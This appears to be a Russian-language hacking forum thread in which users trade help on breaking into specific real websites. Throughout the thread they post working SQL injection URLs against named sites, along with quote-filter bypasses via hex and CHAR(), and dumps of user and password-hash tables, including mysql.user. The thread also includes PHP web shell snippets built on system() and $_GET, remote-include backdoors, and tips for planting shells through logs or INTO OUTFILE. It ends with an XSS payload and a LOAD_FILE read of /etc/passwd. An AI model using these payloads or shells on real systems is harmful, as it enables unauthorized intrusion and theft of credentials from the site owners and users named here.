3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша?
4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику?
5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе?

Буду оч признателен за подсказку.
Ничего странного, если, предположим, в index.php код <?php include $ctr; ?> , то результат вполне ожидаем.
1. нет, если они с расширением php, с другими расширениями должно заинклудиться.
2. как правило, нет. можно конечно написать эксплоит для этого инклуда, который будет брутить имена файлов, но это глупо.
3. зависит от сервера. я бы порекомендовал залить шелл, почитав error.log (о том, как это сделать, читай на форуме). ну и конфиг апача (httpd.conf)
4. ...
5. смотри статью Единички "У природы нет плохой погоды", а также ищи на форуме.

http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFROMATION_SCHEMA .COLUMNS+where+table_name=main_users+limit+1,1/*

почему??

SELECT command denied to user 'u23390'@'10.10.223.240' for table 'COLUMNS'

http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFROMATION_SCHEMA .COLUMNS+where+table_name=main_users+limit+1,1/*

почему??

SELECT command denied to user 'u23390'@'10.10.223.240' for table 'COLUMNS'

1) Ты ошибся, смотри ты написал INFROMATION_SCHEMA.COLUMNS, а надо INFORMATION_SCHEMA.COLUMNS

2) Делать надо не так: table_name=main_users, а так: table_name='main_users', т.е. писать в кавычках.

3) Но здесь кавычки фильтруются, но это легко обойти, написав название таблицы в хексах: 0x6d61696e5f7573657273

В итоге должно выглядить так:

http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFORMATION_SCHEMA .COLUMNS+where+table_name=0x6d61696e5f7573657273+l imit+0,1/*

P.S. Эта инъекция уже выкладывалась, юзай антибоян:

http://antiboyansql.narod.ru/sql.txt

?id=2+union+select+table_name,2,3,4+from+INFORMATI ON_SCHEMA.TABLES/*

получаю

Query failed : SELECT command denied to user 'metropo3_donban'

helpppp

?id=2+union+select+table_name,2,3,4+from+INFORMATI ON_SCHEMA.TABLES/*

получаю

Query failed : SELECT command denied to user 'metropo3_donban'

helpppp

Ну и че? чуть-чуть аглицкого заподло изучить?... не имеешь ты права такой запрос к БД использовать, отключена возможность, и такое бывает... а че ты хотел? (наверное бесплатный хостинг)

Как обычно тему удалили. Здорово вообще. Есть скуль на неро, вот линк http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/* юнион не пашет и пишет что ошибка в sql запросе хотя почему то group by нормально работает. Посмотрите скуль, скажите своё мнение.

2 4nob1oz

Может быть версия скуля 3.x.x?

И правда, версия MySQL 3.*
Запрос, подтверждающий это:
http://www.nero.com/eng/showpress.php?id=100+and+substring(version(),1,1)= 3

А как же тогда данные из базы выуживать без union, это же обьединение а если его нет то как достать данные то, таблиц то мы не знаем да и information_schema.tables тут и не пахнет конечно же. Я с мускулом 3 версии ниразу не работал. Как быть тогда?

Ничего из него не вытащить, максимум можно узнать название базы данных, пользователя и ещё несколько системных переменных... К сржалению всё

это blind sql-inject

читай есть на форуме..
например тут
http://forum.antichat.ru/thread19844.html
http://forum.antichat.ru/showpost.php?p=407227&postcount=3

ну и конечно тут http://www.securitylab.ru/contest/212099.php?

Termin@L
4nob1oz

Почитайте, наверно много нового узнаете...
http://www.securitylab.ru/contest/212101.php

Да знаю я что это blind :) Просто я ниразу с мускулем третим не работал и все пишут уже с union, а в третем просто нету его. Вообще жесть blind sql inj на mysql 3.x кошмар просто :)

To PSIH: Спасибо за линк чтото на подобие этого я и искал.

MySQL Error: 1267 (Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_bin,IMPLICIT) for operation 'UNION')
Как обойти?

Добавлено:

При запросе ...?id=-1+union+select+1,2,3
вывод есть, а при
При запросе ...?id=-1+union+select+1,version(),3
выводится хрень выше

Как обойти?

Добавлено:

При запросе ...?id=-1+union+select+1,2,3
вывод есть, а при
При запросе ...?id=-1+union+select+1,version(),3
выводится хрень выше
Используй convert()

convert(version()+using+???) ?

version() using latin1 - попробуй так

union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version() , 0x71),0x71)

Здравствуйте я полохо знаю sql так что заранее спасибо.
У меня такой вопрос если в поле аутентификации я ввожу например 99 и ' и сервер мне выдает
E_DB_QUERY
SELECT * FROM `sunz_users` WHERE `login` = '99'' LIMIT 1;
Могу я что нить отсюда выудить

запрос вида
?login=-1'+union+select+someshit+from+sometable/*
поможет)
имена таблиц и столбцов надо подбирать.

запрос вида
?login=-1'+union+select+someshit+from+sometable/*
поможет)
имена таблиц и столбцов надо подбирать.

а зачем?

просто ввести в поле
1' or 1=1 limit 1/*
и все...

запрос который выполнится будетSELECT * FROM `sunz_users` WHERE `login` = '1' or 1=1 limit 1;

другими словами выбрать все данные из таблицы `sunz_users` там где поле login = 1 или если 1=1, а т.к. 1 всегда равно 1 то благодаря limit 1 запрос выбирает из таблицы первые записи (обычно админские) кстати limit 1 необязательно

Scipio хм а ты не думал что выбор идет только по логину что впринципе не подходит под твой метод, поскольку наверняка проверка пароля идет в самом скрипте. Этот метод был бы полезен если бы запрос выглядел вот так SELECT * FROM `sunz_users` WHERE `login` = '99'' AND `pass` = '99' LIMIT 1;
n1†R0x скажи а зачем подбирать имена таблиц и столбцов? ведь сервер выплевывает имя таблицы с юзером и поле с логином осталось только поле с пассом...
MrUpii а вообще бы кинул бы ссылку...

n1†R0x скажи а зачем подбирать имена таблиц и столбцов? ведь сервер выплевывает имя таблицы с юзером и поле с логином осталось только поле с пассом...

Собственно, я это и имел в виду.
Кстати, не факт, что там лишь одна таблица с юзерами.. Может форум есть, может еще что-то.

Scipio, способ, который я указал, наиболее универсален, поскольку он является общим в большинстве случаев а также позволяет выдрать данные из других таблиц (никто ведь не сказал, что там, все хранится в users, а не в admins например).

Scipio, способ, который я указал, наиболее универсален, поскольку он является общим в большинстве случаев а также позволяет выдрать данные из других таблиц (никто ведь не сказал, что там, все хранится в users, а не в admins например).

да конечно, он более универсален, но и более проблематичен при определенных условиях...

А вобще действительно надо ссылку, потому что, тыкать пальцем в небо, бесполезно... согласен и с I-I()/Ib и с n1†R0x все зависит от конкретного случая

недавно начал изучать скуль иньекции, неподскажите как узнавать имена таблиц?

2 СИБОН. Тут смотря к чему таблицы. Если к извесным форумам то таблицы извесны (если их не поменяли). Например таблица юзеров phpbb форума называется phpbb_users. Если это 5 версия Мускула или MSSQL то таблицы можно увидеть через information_schema.tables. Ну, и самый тяжелый способ это подбирать ручками, например users, admins, members и т.д. Еще есть проги для подбора таблиц по словарям. Например программа от SQLHACK или скрипт от halkfild.

otice: Undefined variable: _news_photo in /home/nwlove/domains/XXX.ru/public_html/news.php on line 28

Notice: Undefined variable: _news_tm in /home/nwlove/domains/XXX.ru/public_html/news.php on line 30

Notice: Undefined variable: _news_zag in /home/nwlove/domains/XXX.ru/public_html/news.php on line 31

Notice: Undefined variable: _news_text in /home/nwlove/domains/XXX.ru/public_html/news.php on line 33

Notice: Undefined variable: _news_source_url in /home/nwlove/domains/XXX.ru/public_html/news.php on line 35

Notice: Undefined variable: _news_source in /home/nwlove/domains/XXX.ru/public_html/news.php on line 37

Notice: Undefined variable: _news_typenm in /home/nwlove/domains/XXX.ru/public_html/news.php on line 48

Notice: Undefined variable: _news_type in /home/nwlove/domains/XXX.ru/public_html/news.php on line 48

Notice: Undefined variable: _news_type in /home/nwlove/domains/XXX.ru/public_html/news.php on line 48

Notice: Undefined variable: _news_bank in /home/nwlove/domains/XXX.ru/public_html/news.php on line 49

Имеются такие сообщения. Смущает сообщение "неопределенные переменные"...подстановка кол-ва таблиц рез-та пока не дала...

Что Вы об этом думаете?

otice: Undefined variable: _news_photo in /home/nwlove/domains/xxx.ru/public_html/news.php on line 28

Notice: Undefined variable: _news_tm in /home/nwlove/domains/xxx.ru/public_html/news.php on line 30

Notice: Undefined variable: _news_zag in /home/nwlove/domains/xxx.ru/public_html/news.php on line 31

Notice: Undefined variable: _news_text in /home/nwlove/domains/xxx.ru/public_html/news.php on line 33

Notice: Undefined variable: _news_source_url in /home/nwlove/domains/xxx.ru/public_html/news.php on line 35

Notice: Undefined variable: _news_source in /home/nwlove/domains/xxx.ru/public_html/news.php on line 37

Notice: Undefined variable: _news_typenm in /home/nwlove/domains/xxx.ru/public_html/news.php on line 48

Notice: Undefined variable: _news_type in /home/nwlove/domains/xxx.ru/public_html/news.php on line 48

Notice: Undefined variable: _news_type in /home/nwlove/domains/xxx.ru/public_html/news.php on line 48

Notice: Undefined variable: _news_bank in /home/nwlove/domains/xxx.ru/public_html/news.php on line 49

Помогите разобраться...смущает сообщение "неопределенная переменная". Попытка выяснить кол-во колонок рез-та не дала.

2hayabusa

а че тут думать в скрипте используются ранее неопределенные переменные

и при чем тут подстановка кол-ва таблиц

скрипт давай мож че подскажу

А поподробнее можно, после чего это вылезает

Значит, неопределенная переменная сидит на этих строчках.)
http://nwlove.ru/?type=115&idDn=22402&idUsDn=14032

Там еще фопен с http://www.kaliningrad.ru/news/news.txt для показа новостей.

TO mindw0rk:
:) Изначально цель другая была ..а это один из сервисов.

Ошибка выдается при обращении
http://baltportal.ru/index.php?type=500&idNews=7338'
раз уж уважаемый mindw0rk все раскусил=)

http://nwlove.ru/?type=115'

TO mindw0rk:
:) Изначально цель другая была ..а это один из сервисов.

Ошибка выдается при обращении
http://baltportal.ru/index.php?type=500&idNews=7338'
раз уж уважаемый mindw0rk все раскусил=)

не вижу проблеммы
http://baltportal.ru/index.php?type=500&idNews=-7338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16/*

копай там 5 мускул

имхо выборка из базы в пхп засабачена (@) поэтому то переменные не инициализируются а при правильном запросе все присваивается

извиняюсь за ламерский вопрос... просто я в php вобще ноль... :( вобщем допустим я нашол дырявый сайт и нашол несколько скриптов которые можно "поправить" вопрос как мне в них внедрить свой маленький шел т.е. мне нужна только командная строка... пытался сделать так:
<?
код скрипта
?>
<?
system($_GET['c']);
?>

неработает....
и вот так пытался
<?
код скрипта

system($_GET['c']);
?>

тоже нехочет работать... подскажите как правильно это сделать?

скорее всего запрещенно выполнение команды system в php.ini попробуй несколько других функций типа passthru($_GET['c']), shell_exec($_GET['c']) если мне не изменяет память есть еще несколько но скорее всего они тоже запрещенны.
ЗЫ еще поробуй вот так
<?php
код скрипта

system($_GET['c']);
?>

попробуй вот это вставить вначале скрипта
<?
@system($_GET['cmd']);
?>

если не стоит safemode и system не отключена должно работать, а если всетаки все отключено можешь так
<?
@include($_GET['incld']);
?>


и будешь вызывать так:
http://сайт.дмн/скрипт.пхп?incld=путь до твоего шелла

и инклюдь шелл

Немогу выполнить такой вот запрос.
htt_p://la2.spark-games.ru/la2info/?part=items&id=1'+or+1=(select+top+1+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+('s kill_acquire'))--
В чём проблема?

Немогу выполнить такой вот запрос.
htt_p://la2.spark-games.ru/la2info/?part=items&id=1'+or+1=(select+top+1+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+('s kill_acquire'))--
В чём проблема?
В филтрации кавычек читай здесь https://forum.antichat.ru/showpost.php?p=456474&postcount=29

Попробовал выполнить с двойными ковычками в имени таблицы, получил имя второй (sa_names), дальше нету :( Не пойму ???

Попробовал выполнить с двойными ковычками в имени таблицы, получил имя второй (sa_names), дальше нету :( Не пойму ???

там еще запятые фильтруются, делай по такому принципу:
http://la2.spark-games.ru/la2info/?part=items&id=1+or+1=(select+top+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES+where+(TABLE_NAME+NOT+IN+(%22skill _acquire%22))%20and%20TABLE_NAME+NOT+IN+(%22sa_nam es%22))--


3-я таблица skill_names и т.д.

Осталась ещё одна проблемка. Кто сможет вывести данные? Там фильтруеться знак ;
Другими способами тоже не получилось.

Народ подскажите что делать дальшо (вроде inj и даже inc нашол но нормально ковырнуть неполучаеццо) ...

inj1 _http://www.att.su/obves_kat/index.php?cat=22222+union+select+1,version(),3,4,5 /*&sub_cat=224&p=1'/*

inj2 _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,database(),u ser(),5/*&p=1'/*

локальный инклуд _http://www.att.su/alessio_wheels/index.php?disk=./../../index

Табличку подобрать никак неполучаеццо.. да и заинклудить чтонить стоящее тоже...

И кста есть ли какойнить софтег/скриптег для автоматического подбора таблиц, а также имеюццо-ли способы узнать имя таблички без перебора?

*добавлено*

Всю ночь я возился с этим сайтом... выдрал все имена таблиц посредствам такой конструкции...
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,table_name ,5+from+information_schema.tables+limit+73,1/

Но мля, из табличек ничего нечитается... что делать???

http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_na me='g2_User'/*
Такой запрос выдаёт "Query failed"

Версия сервака: 5.0.24a-log
Юзер и хост: att_su@localhost
название бд: att_su
Таблички

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
KEN_categories
KEN_detal
KEN_picture
KEN_products
SS_categories
SS_detal
SS_picture
SS_products
SS_subcategories
cesp_expand
cesp_prebuild
g2_AccessMap
g2_AccessSubscriberMap
g2_AlbumItem
g2_AnimationItem
g2_CacheMap
g2_ChildEntity
g2_Comment
g2_DataItem
g2_Derivative
g2_DerivativeImage
g2_DerivativePrefsMap
g2_DescendentCountsMap
g2_Entity
g2_ExternalIdMap
g2_FactoryMap
g2_FailedLoginsMap
g2_FileSystemEntity
g2_Group
g2_ImageBlockCacheMap
g2_ImageBlockDisabledMap
g2_Item
g2_ItemAttributesMap
g2_Lock
g2_MaintenanceMap
g2_MovieItem
g2_PermalinksMap
g2_PermissionSetMap
g2_PhotoItem
g2_PluginMap
g2_PluginPackageMap
g2_PluginParameterMap
g2_RecoverPasswordMap
g2_RssMap
g2_Schema
g2_SequenceId
g2_SequenceLock
g2_SessionMap
g2_TkOperatnMap
g2_TkOperatnMimeTypeMap
g2_TkOperatnParameterMap
g2_TkPropertyMap
g2_TkPropertyMimeTypeMap
g2_UnknownItem
g2_User
g2_UserGroupMap
g2_WatermarkImage


Умные люди, подскажите как можно поступить в такой ситуации?

table_na me='g2_User'
1) Кавычек не надо.
2) Переводи в hex или char выделенный кусок.
И иньекций у тебя не 2, а одна.

Все выводиться, вот запрос
http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_na me=CHAR(103,50,95,85,115,101,114)/*
Кавычки вообщето нужны обязательно, но в данном случае у нас фильтруються кавычки, потому делаем CHAR(103,50,95,85,115,101,114) что равно g2_User - без кавычек.

Во блин, а вывод из таблиц не смог выполнить... та же ошибка в запросе :(

Спасибо огромное, всё выводится, просто руки у меня кривые - я непрально скопировал, с пробелом в name...
http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_na me=CHAR(103,50,95,85,115,101,114)/*


подскжите плз утилитку для перевода в CHAR ? :-)))

someshit.net/tools/char.php
someshit.net/tools/encoder.php

по мне удобней хексить \=

а вообще на твоем месте я бы залил шелл через инклуд.. быстрее и удобней


updated
ЗЫ magic quotes 1, не получится через него залить ))



ya_mag

пробуй разные системные ф-ии

passthru($cmd)
shell_exec($cmd)

и тд, т.к. возможен safe_mod с disable ф-ии system

Доброго времени суток.

Такой вопрос, есть ли способ осуществить SQL-injection, на сайте где работы с БД используется Parameterized Input и Stored Procedures ?

Т.е. данные от пользователя сначала заносяться в специальный объект например:
parameter = new SqlParameter("name", SqlDbType.VarChar);

parameter.Value = txtUserInput.Text;

При этом они проверяются на тип/размер. А после передаются в stored procedure.


Спасибо.

Есть форма. При подcтановке в поле user ', вылетает ошибка синтаксиса.
Url имеет следующий вид:
...php?username=%27&credit=1&unit=false&submit=%D0%9F%...
т.к. поле для имени пользователя, то пробелы фильтруются, пробую обойти
...php?username=-1/**/order/**/by/**/1/*&credit=1&unit=false&submit=%D0%9F%...
получаю туже форму, нормально, идем дальше, увеличил запрос на 20, та же форма, на 30, с дуру прописал 8888, все та же форма и без ошибки. Можно с этим что то сделать?

прива всем такая ситуация.. я нашел что на сайте есть таблицы users а там колумны login и password такая фигня я ввожу запрос
id=-1+union+select+1,login,3,4+from+users+limit+1,1/*

послаю запрос он мне выводит
Table 'pincode.user' doesn't exist
я бы еще согласился если бы там было
Table 'user' doesn't exist
но причем тут pincode.user

что предложите ???

это имя базы, если ты работаешь с 5 веткой, то посмотри параметр table_schema.
Таблица user может существовать но в другой базе, обратишся к ней в форме имя_базы.user

но причем тут pincode.user
pincode - название базы
user - название таблицы

я немного не догнал что делать ,Ю можно поподробнее?? заранее благодарен ))

В общем этим запросом ты пытаешься выдрать данные из таблицы user, которая находится в базе pincode. А чтобы проникнуть в базу нужно указывать в запросе имя базы.название таблицы, выходит pincode.user. Понятнее? =)

если я тебя парвильно понял то так??
id=-1+union+select+1,login,3,4+from+pincode.users+limi t+1,1/*

если я тебя парвильно понял то так??
id=-1+union+select+1,login,3,4+from+pincode.users+limi t+1,1/*

Ну наверное ;)

не хляет (((((

и не попашет то что тебе сказали полная ерунда, это означает, что в БД к которой ты имеешь доступ (pincode) нет таблицы users... ищи другую таблицу с акаунтами или если пятая ветка мускула, читай таблицу INFORMATION_SCHEMA

а че делать если в sql inj нету выводимых полей. как можно до чего-то докопатся ?

и не попашет то что тебе сказали полная ерунда, это означает, что в БД к которой ты имеешь доступ (pincode) нет таблицы users... ищи другую таблицу с акаунтами или если пятая ветка мускула, читай таблицу INFORMATION_SCHEMA
а что интересного в таблице INFORMATION_SCHEMA

P.S. а вот мне неп онятно вот ты гвооришь нет таблицы users тада почему я нашел ее там ??? с пмощтю Information_schema.tables нашел таблицу Users ....

может быть просто нет доступа ??? к чтению данной таблицы )

а че делать если в sql inj нету выводимых полей. как можно до чего-то докопатся ?
Если версия >4.1 кажется, можно попытаться вывести через and-запрос и подзапросы, читай статьи по blind sql inj.

а че делать если в sql inj нету выводимых полей. как можно до чего-то докопатся ?

Почитай статьи по blind sql-inj, на сколько я помню, в любой версии можно по буквам подобрать колонки\таблицы и их содержимое.

добавлено:

Через where+...+like+... можно в любой версии :)

Хм, у меня такая трабла, при инъекции в mssql при запросе с кавычкой выводится стандартная ошибка

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '5F42D5B0', 3, 1'.

/software/product.asp, line 62

Но при запросе, допустим

'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--

Вылазает ошибка

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.

/software/product.asp, line 62

Почему вылазает эта ошибка и как ее обойти ?

замени + на /**/ или попробуй вместо одинарной кавычки поставить двойную

Почему вылазает эта ошибка и как ее обойти ?
Он же те явно пишет типа незакрытая кавычка в запросе:
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '5F42D5B0', 3, 1'.

Следовательно инъекцию надо проводить без кавычки, например подставлять -1 и дальше свой запрос, т.е. вызвать не существующее значение...
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
правда иногда работает и так, т.е. используешь значение и кавычку...
-1'+or+1.......

подскажите, если не затруднит.
Возможно ли при активной КСС перехватить реферера или квери стринг в https, или браузер обязательно их почистит? я бы сам поэксперементировал, но лень ;)

пожалуйста, скажите как слить базу солёных хешей на Ipb форуме?

прива я решил сдампить базу испольщовал прогу ачата )))
вот что он мне вывел
=====_Databases_Dumper_MSSQL(MySQL-5.*)_=====

Mon Sep 17 21:36:34 2007

*URL:____________http://www.site.ru/?pageId=1&subId=1
UNION-Subquery:_UNION
Algoritm:_______only Tables
Evristic:_______ON
Brut:___________OFF
NOT:____________NOT IN
HEX:____________OFF
Space:__________%20
POST-GET:_______GET
Time:___________0
User-Agent:_____useragent.txt
Proxy:__________proxy.txt
Log:____________log_basedump.txt


=====_Databases_Dumper_MSSQL(MySQL-5.*)_=====

GO!

Start evristic detection. Please, WAIT...

Detect MySQL

OK! Find 1 column.

Use mysql concat-tehnology:

First Answer: blahhh
Second Answer: hhhalb


Sorry, Work Column not detect =( EXIT


запрос был таким
C:\public>perl.exe mssql_base_dump_111.pl -u "http://site.ru/?pageId=1&s
ubId=1'" -M MySQL -t Cart

очень прошу помоч...

Calcutta, что бы твой запрос выполнился нужно чтобы в предыдущем была ошибка. Вот так, например
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,table_name,colum n_name),4,5,6,7,8+from+information_schema.columns
и переберай таблички )

Следовательно инъекцию надо проводить без кавычки, например подставлять -1 и дальше свой запрос, т.е. вызвать не существующее значение...
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
правда иногда работает и так, т.е. используешь значение и кавычку...
-1'+or+1.......

[53x]Shadow , Scipio пасиб, но я все это пробовал, в ответ получаю ошибку

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to uniqueidentifier.

/software/product.asp, line 62

Что она означает ?

Народ, сорри что снова задаю тотже вопрос что и парой страниц ранее,
безусловно помощь мне оказали, но доконца осуществить задуманное мне так и не удалось...

Вкраце повторюсь и опишу проблему..

при помощи такого запроса удалось выдрать таблички
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,table_name ,5+from+information_schema.tables+limit+73,1/

их 73 штуки..
из них лиш одна пахожа на ту, где хранятся логины и хэши
она называется g2_User и идёт 71 по счету...

Кавычки фильтруются, но при помощи CHAR удалось вытащить из этой таблички названия полей таким вот образом:

_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,column_nam e,5+from+information_schema.columns+where+table_na me=CHAR(103,50,95,85,115,101,114)+limit+6,1/*
поля
g_id
g_userName
g_fullName
g_hashedPassword
g_email
g_language
g_locked

Но далее при попытке вывести данные таким образом:
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+g 2_User/*

вылетает сообщение о неверном запросе...

Ктонибудь, подскажите плиз в чём проблема, и как её решить?)

of69, нужно в запросе указать бд:

http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+g allery2.g2_User/*

2 of69
Ктонибудь, подскажите плиз в чём проблема, и как её решить?)
Смотришь database(), если запрос возвращает к примеру db1, то меняешь запрос на ...+from+db1.g2_User...
Если не прокатывает, то смотришь в какой базе эта таблица лежит.
...select+table_schema+from+information_schema.col umns+where+table_name=g2_User...
Не забудь закодировать имя таблицы char`ои или hex'ом. Ну и соответственно полученной базе составляешь запрос.

2 Calcutta
может кто помочь с подбором?
Никакого посимвольного подбора. Юзай limit. ^^
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,table_name,4,5,6,7,8+from+infor mation_schema.tables+limit+0,1/* Поочередно меняешь limit+0,1/*, limit+1,1/*, 2,1 и т.д. Все таблички как на ладошке.

Лол, под пароли не создается спец. таблица :D

Ищи на форуме списки распространенных названий пользовательских таблиц.

account
accounts
game_accounts
sup_auth
la2_auth

и т.д.

распространенные пробовал уже, практически все те что есть на форуме.
значит у меня должен будет быть запрос примерно такой:
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,[название таблиц с паролями],[id аккаунта]),4,5,6,7,8+from+[таблица с аккаунтами (к примеру, accounts)]/*

DB function failed with error number 1146
Table 'db0742011.jos_session' doesn't exist SQL=SELECT session_id FROM jos_session WHERE session_id = '038f08755e3d58568bf9b979e1d09571'
SQL =

SELECT session_id
FROM jos_session
WHERE session_id = '038f08755e3d58568bf9b979e1d09571'

Подскажите что это?

Ну если дословно... Это неуспешное выполнение какой-то функции. Причина - попытка выборки из несуществующей таблицы "jos_session" в базе "db0742011".

а как это можно исправить и как хакер может этим воспользоваться?

ссылку, пожалуйста, выложи =) а там мож чем и сможем помочь.
//обложился распечатками статей.. всё-таки тяжело одному сидеть разбираться -))
//может кто подсказать по моей инъекции, а то мозг разрывает уже -)) второй день пытаюсь расковырять где там пароли лежат. а если кто доработает, то на плюсики не поскуплюсь ;)

http://www.battle.rapx.net.ru/index.php

1d37r, ну то, что не работает хакер вряд ли использует... Кода я не видел, поэтому не знаю как передаётся этот хеш скриптам, и что фильтруется... Если параметр, в котором передаётся хеш уязвим к SQL-Injection, то можно провести атаку. Настчёт исправления опять же... Ты смотрел - эта таблица, из которой идёт выборка есть?

если честно я не знаю просто знакомый попросил посмотреть я посмотрел нихера не понял... вот решил у вас поинтересоваться)))) вообщем так на первый взгляд ничего опасного нет??

Помогите залить шелл если это возможно.
Вот нашел давно такие скуль иньекции http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,user,password,6+from+mysql.u ser/*
http://www.azovsintez.com/user/links.php?cond=-2+union+select+1,2,3,4,5/* Сайты расположены на одном хостинге пароль к ftp расшифровать несмог. К некоторым владельцам сайтов есть пароль, но к незнаю где его вводить??? Еще там есть форум, может кто-то сможет доработать скуль чтоб вытащить хеш админа форума.

MegaBits, форумные http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,pass,login,6+from+forum.user s/*

Проблема решена, с помощью наставления на путь истинный более опытными sql-injecter'ами. :)
Всем, принявшим участие, выражаю огромную благодарность!

Помогите раскрутить скулю itsoft.ru/search/?search_query=1&in_cat=1'

Помогите раскрутить скулю itsoft.ru/search/?search_query=1&in_cat=1'
Пользователь урезан в правах. Делать нечего

http://itsoft.ru/search/?search_query=1&in_cat=hek%'+union+select +version()/*
version() = 4.1.14
user() = itcms_test@localhost
database() = itcms_test

http://itcms3.itsoft.ru/itcms/
^^

http://www.stalker-portal.ru/polls.php?id=1'
(Моя первая найденная скуля... Сразу говорю, вопросу ламерские, но для того и эта тема)

НУ так вот, число столбцов 6..

Однако по Полному ФАКу в разделе статьи в пункте "2.1.2 Определение выводимых столбцов" у меня стопор... Никакие "циферки" не высвечиваются :(

http://www.stalker-portal.ru/polls.php?id=1' UNION SELECT 1,2,3,4,5,6 --/* -Вот собственно и оно:(

В общем наставьте меня на путь истинный... Хочется узнать, можно отсюда что выжать или нет(

http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1) )>0/*
http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1) )<0/*

только там некая защита.. врубается на кол-во запросов в минуту, поэтому через проксики надо брутить все ))

Хмм, а эта защита случаем не на 200 секунд блочит? Я пытался просканить но меня забанили изза 'Hammering' на 200 секунд.
Такс, а где можно почитать про or ascii...? В факе этого нет...

Спс буду брутить) А как перейти на второй символ?

sm.. С символами разобрался, покачто не забанили... А ты сколько брутил то?) Как определить сколько символов? Точнее когда закончатся символы?

А как ты сделал так что он тебе показывает голосование при 1? ТАм на 1 и на 0 ничего нет в id


И еще... Пасс сгенеренный сто пороцентов... Как же я с регистром разберусь??

smroqt?lnb`kg ...

И еще неизвестно сколько будет дальше...

После 16го символа пошли одни нули.... Тоесть я > поменял на = так можно? Это значит что всего 16 символов?

smroqt?lnb`kgnrs

Вот что вышло, и что это такое я сбрутил? Куда это совать?)

И еще если я сбрутил из version() первые три символа 4-0 значит ли это что версия 4.0?

вопросег. есть ли тут[http://www.lipetsk.ru/sites/catalogue.html?category=-1+union+select+1,2,3,4,5,6,7,8/*] SQl-ing ? и как раскрутить?

поля подбирал с помощью "order by". ошибку не показывает но догадоццо что она есть можна.
и ещё. если сделать так http://www.lipetsk.ru/sites/catalogue.html?category=-1+'><script>alert('XSS')</script><'
то будут пасив xss

mr.The
Первый параметр выводится в href а-тега.
Чтобы каждый раз не искать результат в сурсе страницы, можно закрывать тег из самой инъекции.
http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',table_schema,'.',table_name,'<a '),0,0,0,0,0,0,0+from+information_schema.tables/*
http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',login,':',password,'<a '),0,0,0,0,0,0,0+from+www2.auth_users/*

V1k
пасиба!

http://www.ksu.ru/f16/index.php?id=10&idm=0'&id_news=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11/*

Выводит имя базы, пользователя и версию. Подобрать названия таблиц что-то не получается. Что можете посоветовать кроме XSS?

Да ничего не могу, единственное вот страница админа -
http://www.ksu.ru/archeol/ceramics/index.phtml?flag=1&k=0
попробуй подобрать что-нибудь... А так там ЛОАД_ФАЙЛ не работает, разве что попробуй шелл залить через into outfile, только надо подобрать хотябы одну таблицу, любую...

Да я сам пробовал лоад файл. Увы, не помогло. Спасибо за совет.

Подскажите, что дальше делать?
http://www.nap.edu/topics.php?topic=350+union+select+1,2,3,4,5,6,7,8, 9,10,11

http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(CHAR(46,46,47,46,46 ,47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7 ,8,9,10,11/*


Root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
